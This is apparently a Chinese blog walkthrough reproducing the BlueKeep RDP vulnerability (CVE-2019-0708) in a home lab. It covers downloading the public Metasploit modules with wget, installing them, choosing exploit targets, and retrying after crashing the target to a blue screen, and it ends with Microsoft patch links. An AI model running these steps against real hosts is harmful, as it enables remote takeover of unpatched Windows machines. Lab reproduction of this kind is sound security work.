CVE-2019-0708漏洞复现-小白篇

d14d8093264774808601e01217291e88_10eef03f7e1a79a38c720d0e43050b3d

前言

就在最近这几天,准确的说2019.9.6由黑鸟的公众号,发布文章说MSF集成了CVE-2019-0708的exp,瞬间整个安全圈都炸了锅,为啥这么说这次的RDP漏洞相当于之前的永恒之蓝,危害之大可想而知!忙完手上的事就开始漏洞复现了

0x01 漏洞介绍

​ Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。

0x02 环境准备

  • kail

  • windows 7(其中windows7 一定要用旗舰版,这里提供的就是旗舰版本的链接,企业版亲测不行,只能蓝屏)

    ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

  • windows 2008 R2版本

    ed2k://|file|cn_windows_server_2008_r2_hpc_x64_dvd_552764.iso|2959194112|1941C1937261AB4F6F9A28F86FE3DAC0|/

  • 从gayhub把exp下载下来,cve-2019-0708官方下载地址

    1568191673162

    1
    2
    3
    4
    5
    6
    7
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

    可以通过上面的命令直接下载到kail,也可以直接打包文件拖到kail中(我用的是就是第二种)

    1568192109819

  • 将exp导入到msf中,前提你是msf5,如果不是一定要先更新,类似下面的就行

    1568193062956

1
2
3
4
5
6
7
8
9
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/

cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/

cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

(如果提示rdp目录不存在,自己新建一个就可以了,顺便给个chmod +x权限就行)

cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

一般建议使用cp -i使用这个命令如果文件夹有同样的文件会提示是不是覆盖的,遇到覆盖的直接覆盖,一定要给文件或者文件夹赋予权限chmod +x 目录

0x03 漏洞复测

首先进行win7旗舰版的测试,测试之前请确保你主机能ping通目标机,win7版本要正确7601(之前企业版就是7600),并且目标机开放了3389端口。

ps:测试完成后我把虚拟和xshell都关了,所以记录都是又做了一遍得到的,哎!

1568194709639

  • 其实防火墙关不关都无所谓,测试完成后我对开了的防火墙也做了相同的操作,也是可以的

  • 再看3389是否开启,计算机—–属性—–远程设置

1568195046350

  • 使用命令msfconsole开启msf

    1568195641628

  • 重新加载所有模块,以保证能够读取到你之前转移到msf的漏洞利用模块。

    1568195889312

  • use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

  • 查看info

    1568196067921

  • 设置rhosts和targer参数,rhosts是我们的win7的机器的ip

    1568196779321

    1568196922139

    设置target=1,但是听说target=2比较稳定,端口都是3389就不用改了!

  • 最激动的时候来了run,等待一会

    1568201124683

    成功获得shell

  • 修改windows的编码为UTF-8,可以使用命令

    1568201349450

0x04 总结一下

其实踩了很多坑,而且就在写文章的时候都在采坑

  1. 就像很多大佬说的现在exp不是很稳定,所以无法连接的情况,巧了,我正好遇到想哭死哈!

    1568201516258

    你会发现你什么都能配置好了,而且上午还成功了,就在复测的时候又不行了,而且target 1-4都试了 ,都不行!

    • 我最后的解决方案就是使用target4直接打到蓝屏,然后试target1就可以了
    • 你还可以多run几次,我朋友fengx就是这样
  2. 还有有时候出现的问题是端口的问题,直接改端口可以解决

  3. 主要看被测机器的版本一定要是7601

  4. 替换文件是否成功更换,也得确定

0x06 漏洞补丁系列下载地址

Windows Server 2008 32位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x86_832cf179b302b861c83f2a92acc5e2a152405377.msu

Windows Server 2008 x64位系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499149-x64_9236b098f7cea864f7638e7d4b77aa8f81f70fd6.msu

Windows Server 2008 R2 Itanium系统:

http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-ia64_fabc8e54caa0d31a5abe8a0b347ab4a77aa98c36.msu

Windows Server 2008 R2 x64系统:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu

Windows Server 2008 Itanium:

http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.0-kb4499180-ia64_805e448d48ab8b1401377ab9845f39e1cae836d4.msu

Windows Server 2003 32位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x86-custom-chs_4892823f525d9d532ed3ae36fc440338d2b46a72.exe

Windows Server 2003 64位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-chs_f2f949a9a764ff93ea13095a0aca1fc507320d3c.exe

Windows XP SP3 32位系统:

http://download.windowsupdate.com/c/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-custom-chs_718543e86e06b08b568826ac13c05f967392238c.exe

Windows XP SP2 64位系统:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsserver2003-kb4500331-x64-custom-enu_e2fd240c402134839cfa22227b11a5ec80ddafcf.exe

Windows XP SP3 for XPe:

http://download.windowsupdate.com/d/csa/csa/secu/2019/04/windowsxp-kb4500331-x86-embedded-custom-chs_96da48aaa9d9bcfe6cd820f239db2fe96500bfae.exe

文章参考

-------------本文结束感谢您的阅读-------------
各位帅哥,美女!有人捧个人场,有钱捧个钱场!